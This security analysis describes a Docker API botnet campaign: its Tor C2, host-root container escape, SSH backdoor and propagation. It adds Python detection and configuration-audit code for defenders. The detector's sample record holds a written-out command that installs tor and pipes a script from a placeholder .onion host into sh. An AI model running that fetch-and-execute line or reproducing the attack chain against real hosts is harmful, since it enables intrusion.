
A significant evolution in the threat landscape targeting misconfigured Docker API endpoints has been observed, shifting from simple cryptojacking operations to the establishment of a sophisticated botnet infrastructure. This campaign, first identified as a cryptojacking operation by Trend Micro in June 2025 and later analyzed in its advanced form by Akamai in August, demonstrates a strategic pivot by threat actors toward building persistent, multi-purpose attack platforms [1, 2]. The attackers leverage the Tor network for anonymity and employ aggressive tactics to lock compromised hosts for their exclusive use, marking a dangerous escalation in cloud infrastructure targeting.
Executive Summary for Security Leadership
This campaign targets organizations with publicly exposed Docker API endpoints (port 2375), primarily affecting technology, financial services, and healthcare sectors, though any organization using containerized applications is potentially vulnerable [7]. The threat has evolved from resource theft to establishing infrastructure for future complex attacks. Initial access is gained by exploiting misconfigured Docker APIs, followed by deployment of Alpine Linux containers that mount the host filesystem for persistent access. The operation uses Tor hidden services for command and control, making detection and attribution more difficult.
Key points for security leadership include:
* **Objective Shift:** The primary goal has moved from cryptocurrency mining to botnet recruitment and persistence.
* **Hostile Takeover:** The malware actively blocks other threat actors from accessing compromised hosts, indicating a shift toward exclusive resource control.
* **Dormant Capabilities:** The malware contains unused code for exploiting additional services (Telnet, Chrome Remote Debugging), suggesting plans for future expansion.
* **Broader Context:** This campaign exemplifies a trend where attackers chain together small weaknesses like exposed APIs and stolen tokens into significant risks [11].
Technical Analysis of the Attack Chain
The attack begins with reconnaissance scans from IP address `198[.]199[.]72[.]27`, which searches for exposed Docker APIs [2, 6, 7, 9]. Upon identifying a vulnerable endpoint, attackers send an HTTP POST request to create a container from the `alpine:latest` image. A critical technique involves binding the host’s root filesystem (`/:/hostroot:rw`) into the container, enabling container escape and full host manipulation.
The container executes a Base64-encoded command that installs `curl` and `tor`, starts a Tor daemon, and verifies connectivity. This initial access phase uses Tor for anonymity, with all subsequent traffic routed through the Tor network using `socks5h` for DNS resolution and communication [2, 6]. The malware then fetches a second-stage shell script (`docker-init.sh`) from the initial Tor hidden service (`wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad[.]onion`).
The `docker-init.sh` script performs multiple malicious actions that establish persistence and prepare the system for further exploitation. It appends an attacker-controlled SSH public key to `/hostroot/root/.ssh/authorized_keys` and modifies the host’s `sshd_config` to enable root login and public key authentication, creating a reliable backdoor access method [2, 6, 10]. The script also creates a cron job that executes every minute to block port 2375 using all available local firewall tools (`iptables`, `ufw`, `nft`), performing a “hostile takeover” of the victim host that prevents competing threat actors from accessing the API [1].
Advanced Malware Capabilities and Botnet Foundation
The script installs utilities for propagation and evasion, including `masscan`, `libpcap`, `zstd`, and `torsocks`. It sends a POST request to a command and control server (`/bot/add`) with victim IP and architecture information, then uses `torsocks` to fetch a Zstandard-compressed Go binary (`system.zst`) from a second Tor domain (`2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd[.]onion`) [1, 2]. After decompression, the binary is executed as a self-contained orchestrator.
The Go binary, which contains a “user” emoji suggesting possible LLM-assisted creation, serves as the core malware component [1]. It uses `masscan` to find other hosts with port 2375 exposed and attempts to infect them using the same method, enabling self-replication across networks. The malware also actively seeks and removes containers based on `ubuntu` images, which are commonly used by other cryptojacking threat actors, effectively eliminating competition for resources [1].
The binary contains unused code for exploiting two additional ports, indicating planned future expansion. For port 23 (Telnet), it contains logic to brute-force Telnet services using a list of default router credentials, with the bizarre assumption that a successful ‘root’ login indicates a honeypot. For port 9222 (Chrome Remote Debugging), it uses the `chromedp` Go library to attach to exposed Chrome DevTools protocol endpoints, navigate to `checkip.amazonaws.com`, and report compromised hosts to a different C2 endpoint (`/httpbot/add`) [1].
Detection and Mitigation Strategies
Security teams should monitor for containers that immediately install packages (`apk`, `apt`) and then download tools (`curl`, `wget`), as this behavior is characteristic of the initial infection phase. Detection should focus on anomalous inbound connections to ports 2375, 9222, and 23, with particular scrutiny given to Base64-encoded commands executed within containers. Security systems should alert on downloader processes accessing known malicious or suspicious domains, especially `.onion` addresses, and identify unexpected stoppages of services that normally listen on a network port.
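As an added example (not code from the original report or from either vendor's research), the following Python triage turns the indicators above into a check over `docker inspect`-style records: a read-write bind of `/` into the container, a Base64-wrapped command, package installation followed by a downloader, and `.onion` addresses. The sample records and the `.onion` name are constructed placeholders.

```python
import base64
import re

# Indicators taken from the campaign description in the text above
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")      # long base64 blob inside a command line
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b")
INSTALL_RE = re.compile(r"\b(apk add|apt(-get)? install)\b")
DOWNLOADER_RE = re.compile(r"\b(curl|wget|tor|torsocks)\b")

def decode_b64_blobs(text):
    """Decode every long base64 token in a command line, as `base64 -d | sh` would."""
    decoded = []
    for blob in B64_RE.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:   # not real base64 (binascii.Error is a ValueError subclass)
            continue
    return decoded

def assess_container(cfg):
    """Return the indicator names triggered by one `docker inspect`-style record."""
    hits = []
    for bind in cfg.get("HostConfig", {}).get("Binds") or []:
        src, *rest = bind.split(":")                 # "/:/hostroot:rw" -> src "/", mode "rw"
        mode = rest[1].split(",") if len(rest) > 1 else ["rw"]   # Docker's default mode is rw
        if src == "/" and "ro" not in mode:
            hits.append("host_root_rw_bind")
    cmd_text = " ".join(cfg.get("Config", {}).get("Cmd") or [])
    blobs = decode_b64_blobs(cmd_text)
    if blobs:
        hits.append("base64_encoded_command")
    text = cmd_text + "\n" + "\n".join(blobs)        # inspect both the raw and decoded command
    if INSTALL_RE.search(text) and DOWNLOADER_RE.search(text):
        hits.append("install_then_download")
    if ONION_RE.search(text):
        hits.append("onion_address")
    return hits

def is_suspicious(cfg):
    hits = assess_container(cfg)
    return "host_root_rw_bind" in hits or len(hits) >= 2   # rw host root alone is decisive

# Constructed sample records (not real telemetry); the .onion name is a placeholder
_STAGE1 = ("apk add --no-cache curl tor && (tor &) && sleep 10 && curl -s --socks5-hostname "
           "127.0.0.1:9050 http://placeholderonionaddressforexampleonly.onion/docker-init.sh | sh")
MALICIOUS = {"Config": {"Image": "alpine:latest", "Cmd": ["sh", "-c", "echo %s | base64 -d | sh"
                        % base64.b64encode(_STAGE1.encode()).decode()]},
             "HostConfig": {"Binds": ["/:/hostroot:rw"]}}
BENIGN = {"Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
          "HostConfig": {"Binds": ["/srv/site:/usr/share/nginx/html:ro"]}}
```

Feed it the output of `docker inspect` (one record per container) to triage a host; a record with the host root mounted read-write is flagged regardless of what its command looks like.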
Organizations should implement network segmentation to isolate Docker environments from critical network segments and reduce exposure by never exposing the Docker API (2375/tcp), Telnet (23/tcp), or Chrome Debugger (9222/tcp) to the public internet. If remote management is essential, enforce strict authentication and bind services to `localhost` only. Implement strong authentication and authorization for the Docker API if its use is required, and change all default credentials on internet-facing devices and services. Regular security audits should be performed to check for suspicious containers and images, as recommended by Trend Micro researchers [2, 6].
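An added example (not the page's or Docker's own code) that audits a `dockerd` `daemon.json` for the weak listener setting this campaign relies on and shows a hardened equivalent beside it; the certificate paths in the hardened sample are assumed placeholders.

```python
import json
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "localhost", "::1"}
WILDCARD = {None, "", "0.0.0.0", "::"}

def audit_daemon_config(daemon_json):
    """Return a list of findings for a dockerd daemon.json (empty list = nothing flagged)."""
    cfg = json.loads(daemon_json)
    findings = []
    # dockerd only authenticates clients when tlsverify is set and CA, cert and key are given
    tls_ok = cfg.get("tlsverify") is True and all(k in cfg for k in ("tlscacert", "tlscert", "tlskey"))
    for host in cfg.get("hosts", ["unix:///var/run/docker.sock"]):
        u = urlsplit(host)
        if u.scheme != "tcp":            # unix:// and fd:// sockets are local by construction
            continue
        if u.hostname in WILDCARD:
            findings.append(f"{host}: listens on every interface")
        elif u.hostname not in LOOPBACK:
            findings.append(f"{host}: bound to a non-loopback address")
        if not tls_ok:
            findings.append(f"{host}: TCP endpoint without tlsverify (unauthenticated API)")
    return findings

# Constructed examples: the weak setting the campaign abuses, and a hardened equivalent
# (certificate paths are placeholders)
WEAK = json.dumps({"hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]})
HARDENED = json.dumps({
    "hosts": ["tcp://127.0.0.1:2376", "unix:///var/run/docker.sock"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for name, doc in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_daemon_config(doc) or ["ok"])
```

Run it against `/etc/docker/daemon.json`; listeners passed on the `dockerd` command line (`-H`) are not visible to this check and need the same review.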
Akamai researchers highlighted the effectiveness of honeypot techniques using the open-source Beelzebub framework, which uses YAML configurations to mimic real APIs (like Docker) and can integrate LLMs to generate dynamic, realistic responses to attacker probes. Their specific Docker API honeypot configuration is available on GitHub for organizations looking to deploy similar detection mechanisms [1].
Broader Threat Landscape Context
The Docker API campaign is not an isolated incident but part of a larger, interconnected threat landscape in mid-2025. The massive breach at AI chatbot maker Salesloft, which led to the theft of authentication tokens for integrated services like Salesforce, Slack, and Google Workspace, demonstrates the cascading risk of interconnected SaaS platforms [8]. Similar to the Docker attack’s use of Tor and `masscan`, other campaigns are abusing legitimate tools like the Velociraptor forensic framework and Visual Studio Code for command-and-control tunneling, blurring the lines between legitimate and malicious activity [13].
Reports that over 80% of security incidents now originate from web applications accessed via browsers highlight the critical need for defense-in-depth, as adversaries target these new frontiers [12]. This Docker campaign represents a strategic pivot by threat actors from simple resource theft to building infrastructure for more complex and potentially disruptive future attacks, a trend mirrored across the threat landscape [11].
The discovery has been widely reported across the cybersecurity industry, underscoring the evolving threat to cloud and container environments. Articles from multiple security publications have highlighted the campaign’s technical sophistication and the critical importance of securing cloud infrastructure. The consensus among researchers is that this represents a significant evolution in attacker methodology, with implications for how organizations defend their containerized environments.
Conclusion
The evolution of Docker API threats from cryptojacking to botnet recruitment represents a significant shift in attacker objectives and capabilities. This campaign demonstrates how threat actors are building more sophisticated operations that prioritize persistence and future attack potential over immediate financial gain. The use of Tor for anonymity, hostile takeover tactics to exclude competitors, and dormant capabilities for future expansion all point to a more strategic approach to compromising cloud infrastructure.
Security teams must prioritize securing Docker APIs and similar exposed services, implementing robust detection mechanisms, and maintaining awareness of the evolving tactics used by threat actors targeting containerized environments. The techniques and indicators provided in this analysis should enable organizations to better detect, prevent, and respond to these evolving threats.